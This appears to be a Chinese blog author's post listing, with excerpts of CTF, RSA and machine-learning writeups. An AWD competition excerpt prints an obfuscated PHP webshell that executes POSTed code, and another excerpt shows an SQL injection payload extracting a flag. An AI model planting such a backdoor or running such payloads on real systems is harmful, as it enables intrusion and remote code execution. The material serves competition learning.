- 博客(29)
- 收藏
- 关注
原创 机器学习记录之感知机
感知机原理参考博客:【机器学习】感知机原理详解感知机模型:f(x)=sign(w∗x+b)f(x)=sign(w*x+b)f(x)=sign(w∗x+b)signsignsign是符号函数感知机模型的其中一个超平面是:w∗x+b=0w*x+b=0w∗x+b=0www是超平面的法向量,bbb是超平面的截距这个超平面把样本分为正负两类(结合sign()sign()sign()函数)主要思路:1.输入训练数据集:编号宽度长度检验类别133正品243
2020-11-13 14:17:50
1758
原创 机器学习记录之线性回归
线性回归实现线性回归的步骤:提取特征和标签建立训练数据和测试数据使用训练数据训练模型方法一:使用方程参考老师给的代码 testLinearRegAndTrainTest.py1.建立有序的二维数据结构#第一个参数为特征,第二个参数为标签examDict={ '学习时间':[0.50,0.75,1.00,1.25,1.50,1.75,1.75,2.00,2.25, 2.50,2.75,3.00,3.25,3.50,4.00,4.25,4.50,4.75,5
2020-11-12 21:23:57
2441
原创 解决Python3 No module named ‘Crypto‘报错
解决Python3 No module named ‘Crypto‘报错进入site-packages目录,将‘crypto’目录名改为大写‘Crypto’
2020-11-07 18:17:21
2654
原创 RSA-详解dp泄漏
原理:0.基本数学公式a=kb+pa = kb + pa=kb+pamodb=pa mod b =pamodb=p1.RSA的基本公式c≡memodnc \equiv m^emodnc≡memodnm≡cdmodnm\equiv c^dmodnm≡cdmodnϕ(n)=(p−1)×(q−1)\phi(n)=(p-1)\times(q-1)ϕ(n)=(p−1)×(q−1)d×e≡1modϕ(n)d\times e \equiv1mod\phi (n)d×e≡1modϕ(n)2.dp是什么d
2020-10-23 20:44:22
5336
2
原创 解决Python3 No module named ‘Cryptodome‘报错
解决Python3ModuleNotFoundError: No module named 'Cryptodome’pip install pycryptodomex
2020-10-20 21:58:11
20952
6
原创 第三届河北省大学生网络与信息安全选拔赛-Crypto-WP
math [一血]题目:from Crypto.Util.number import *from hashlib import md5flag = "XXX"assert len(flag) == 14pad = bytes_to_long(md5(flag).digest())hack = 0for char in flag: hack+= pad hack*= ord(char) print hack#hack = 6436448535706043484886570840
2020-10-18 10:20:32
997
4
原创 picoCTF-WP
The NumbersDescription:The numbers… what do they mean?Hints:The flag is in the format PICOCTF{}a-1 b-2 c-3 d-4 e-5 f-6 g-7 h-8 i-9 j-10 k-11 l-12 m-13 n-14 o-15 p-16 q-17 r-18 s-19 t-20 u-21 v-22 w-23 x-24 y-25 z-26 大括号前数字对应的字母是PICOCTFGET FLAG!
2020-10-17 17:18:10
2646
原创 一次AWD比赛记录
BEGINssh -p 2201 ctf@118.89.227.105 备份文件以后,首先D盾扫一波使用defence上waf开始修洞.config_common.php这是一个已知后门<?php error_reporting(0);set_time_limit(0);$a=base64_decode("Y"."X"."N"."z"."Z"."X"."J"."0");$a(@${"_P"."O"."S"."T"}[520]); ?>base64_decode:YXN
2020-10-10 19:22:32
589
1
原创 西湖论剑2020-BrokenSystems
题目名称:BrokenSystems题目内容:Successfully modified the encryption module of the encryption system, and then it’s up to you.from Crypto.PublicKey import RSAfrom Crypto.Cipher import PKCS1_OAEPfrom secret import flagimport osrsa = RSA.generate(2048)public.
2020-10-09 21:56:20
601
3
原创 巅峰极客2020-tryrsa
tryrsa感谢CN!题目:from secret import e1,e2,flagfrom Crypto.Util.number import *msg = bytes_to_long("=========Hint:e1="+str(e1)+"=============")p = getPrime(512)q = getPrime(512)N = p*qprint N #92492770373119584460081987762423642921257844727187836762
2020-09-30 10:05:06
827
5
原创 BUU-Crypto-RSA刷题记录(1)
写在前面的:RSA在比赛中特别常见,不熟悉原理的话可以看看这两篇文章RSA加密算法详细解说RSA的自我介绍(1)1.RSA题目:在一次RSA密钥对生成中,假设p=473398607161,q=4511491,e=17求解出d作为flga提交方法一:使用RSA-Tool得到d方法二://import gmpy2e = 17p = 473398607161 q = 4511491phi = (p-1)*(q-1)d = gmpy2.invert(e,phi)print(d
2020-09-28 16:55:17
696
原创 四面八方-WP
题目:key1:securitykey2:information密文啊这是,骚年加油:zhnjinhoopcfcuktlj根据题目我们可以知道这是一道四方密码的题四方密码左上和右下是按照顺序的字母表,五个一行(没有q)右上和左下分别是key1和key2key1和key2需要去除重复字母后,再按剩下字母表中的字母顺序排列形式如下⬇️一一对应可以解得flag也可以转换key1和key2后使用工具网站得到flag工具????网站:http://ctf.ssleye.com/four.ht
2020-09-27 16:43:03
376
原创 BUU-Crypto刷题记录(2)
写在前面的把以前做过的题整理了一遍,要把buu的crypto都刷完目录写在前面的1.MD52.Url编码3.一眼就解密4.看我回旋踢5.摩丝6.[BJDCTF 2nd]签到-y1ng7.password8.变异凯撒9.Quoted-printable10.Rabbit11.篱笆墙的影子12.丢失的MD513.[BJDCTF 2nd]老文盲了14.Alice与Bob15.[GKCTF2020]小学生的密码学16.[BJDCTF 2nd]燕言燕语-y1ng17.[WUSTCTF2020]大数计算1.MD5
2020-09-27 10:42:40
366
原创 [WUSTCTF2020]情书-WP
题目:我给你的情书,请收好。Premise: Enumerate the alphabet by 0、1、2、… 、25Using the RSA systemEncryption:0156 0821 1616 0041 0140 2130 1616 0793Public Key:2537 and 13Private Key:2537 and 937flag: wctf2020{Decryption}根据题目,使用了RSA的加密系统那么我们可以得到N = 2537 #分解得p、q.
2020-09-26 22:03:51
1476
原创 BUU-Crypto刷题记录(1)
1.大帝的密码武器题目附件是一个叫zip的文件,加上后缀名zip,可以得到真实的附件题目:公元前一百年,在罗马出生了一位对世界影响巨大的人物,他生前是罗马三巨头之一。他率先使用了一种简单的加密函,因此这种加密方法以他的名字命名。以下密文被解开后可以获得一个有意义的单词:FRPHEVGL你可以用这个相同的加密向量加密附件中的密文,作为答案进行提交。密文:ComeChina根据题目我们能够知道加密方式是凯撒加密,解密题目中的密文得到偏移量是13,直接加密密文得到flag2.[BJDC
2020-09-26 21:02:57
1244
原创 RSA的算法介绍与数学原理
RSARSA是一种非对称加密非对称加密:Alice与Bob直接传输消息,他们生成了两把钥匙,一把公钥,一把私钥公钥给Alice,Alice使用公钥进行加密,而私钥只有Bob拥有,用来解密加密过程:在接收消息前,Bob会生成两把钥匙,并将其中的公钥给Alice,Alice使用公钥将信息加密后传递给Bob,Bob收到信息后使用私钥进行解密,得到明文。算法1.乘法:将两个质数相乘2.随机数生成算法:生成伪随机数3.Miller-Rabin测试:测试一个数是否为质数(单次测试的可信度不是特别高,需要
2020-09-24 17:34:03
794
2
原创 [NPUCTF2020]认清形势,建立信心-WP
题目:from Crypto.Util.number import *from gmpy2 import *from secret import flagp = getPrime(25)e = # Hiddenq = getPrime(25)n = p * qm = bytes_to_long(flag.strip(b"npuctf{").strip(b"}"))c = pow(m, e, n)print(c)print(pow(2, e, n))print(pow(4, e,
2020-09-10 10:16:48
710
原创 SCTF-RSA-WP
这道题的类型我第一次遇到,主要也接触到sage和LLL算法(学密码数学真的很重要)nc 121.199.14.145 12345得到三组e,n,ce0=0x1589b1732d8ce5aedf1e34a63a14bac68dcc11ee18b94e293efe58c2b77d055db463503a039472eff881b504b90e6bec1c90da3efb02c6b94770ada0a921eb5e9d19a4ca1d26b47cbaee855b72da5a79a9acb675e48c4614
2020-07-09 20:15:43
1049
原创 后浪杯CTF-WP
实验室内部举行的24小时考核赛目录CRYPTO1.CRYPTO-warmup2.佛曰3.babyRSA4.hard_crypto5.aesREVERSE1.BabyRe2.HelloCTF3.insanityMISC1.真签到2.宝可梦二代WEB1.爆破2.command???写在最后的CRYPTO1.CRYPTO-warmup题目:R1EzREVNWlZHTVpVR05KWkdVWkRLUUpXR0VaRUNNWlFHWkFUR1FaV0lFM1RDTkpZR1JEREdPSlRJSVpUQ05
2020-06-22 21:29:44
1308
原创 BUUCTF刷题记录-WarmUp
WarmUp首先检查源码看到注释,查看source.php提示查看hint.phppayloadfile=source.php%253f/../../../../../../ffffllllaaaagggg即可查看flagflag{4207264a-025e-466a-8938-908319885f82}...
2020-04-03 15:19:49
204
原创 两道sql练习题
1.注入得帅照!地址:http://123.57.240.205:4002/点击前往按钮会直接跳转到W4nder的博客,爆破可以得到一个hint(hone.php)hone.php是这样的一个界面,可以开始注入payload:id=9122399%27%20%0a%20UNion%20%0a%20SElect%20%0a%201,(SElect%20%0a%20flag%20%0a%2...
2020-03-27 23:19:01
224
原创 BJDCTF 2nd-WP
Crypto1.签到-y1ng直接base64解码 QkpEe1czbGMwbWVfVDBfQkpEQ1RGfQ==flag:BJD{W3lc0me_T0_BJDCTF}2.老文盲了将文字转化为拼音可以知道文字就是flagflag:BJD{罼雧締眔擴灝淛匶襫黼瀬鎶軄鶛驕鳓哵眔鞹鰝}3.cat_flag...
2020-03-23 19:34:56
764
原创 四道练习题
1.http://123.57.240.205:4002/首先进行了一些常规的操作,没有得到任何信息直接访问flag.php得到flag2.http://123.57.240.205:4005//m修饰符表示正则开启多⾏匹配得到flag3.http://123.57.240.205:4003/变换非字母、数字的字符-WP
网络安全实验室-基础关-WP【by:luoluo】1.key在哪里?答案在源代码里查看源代码的三种方式:直接右键检查/查看源代码、使用开发者工具、command/control+Uflag:jflsjklejflkdsjfklds2.再加密一次你就得到key啦~加密之后的数据为xrlvf23xfqwsxsqf使用Rot13编码可以得到flag我看到其他博主的wp中,有人使用凯撒...
2019-12-18 01:29:30
5246
3
原创 Linux学习记录-基本命令总结
Linuxの命令总结【1】·文件管理类命令(主要是近期学习中遇到过的)【LUOLUOの学习日记2????】·cat命令 :用于连接文件并打印相关参数-n 由 1 开始对所有输出的行数编号-b 和 -n 相似,只不过对于空白行不编号-s 当遇到有连续两行以上的空白行,就代换为一行的空白行–help 对于不懂的命令或软件安装时,都可以用–help来获取帮助-E 在每行结...
2019-11-10 17:10:26
256
2
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人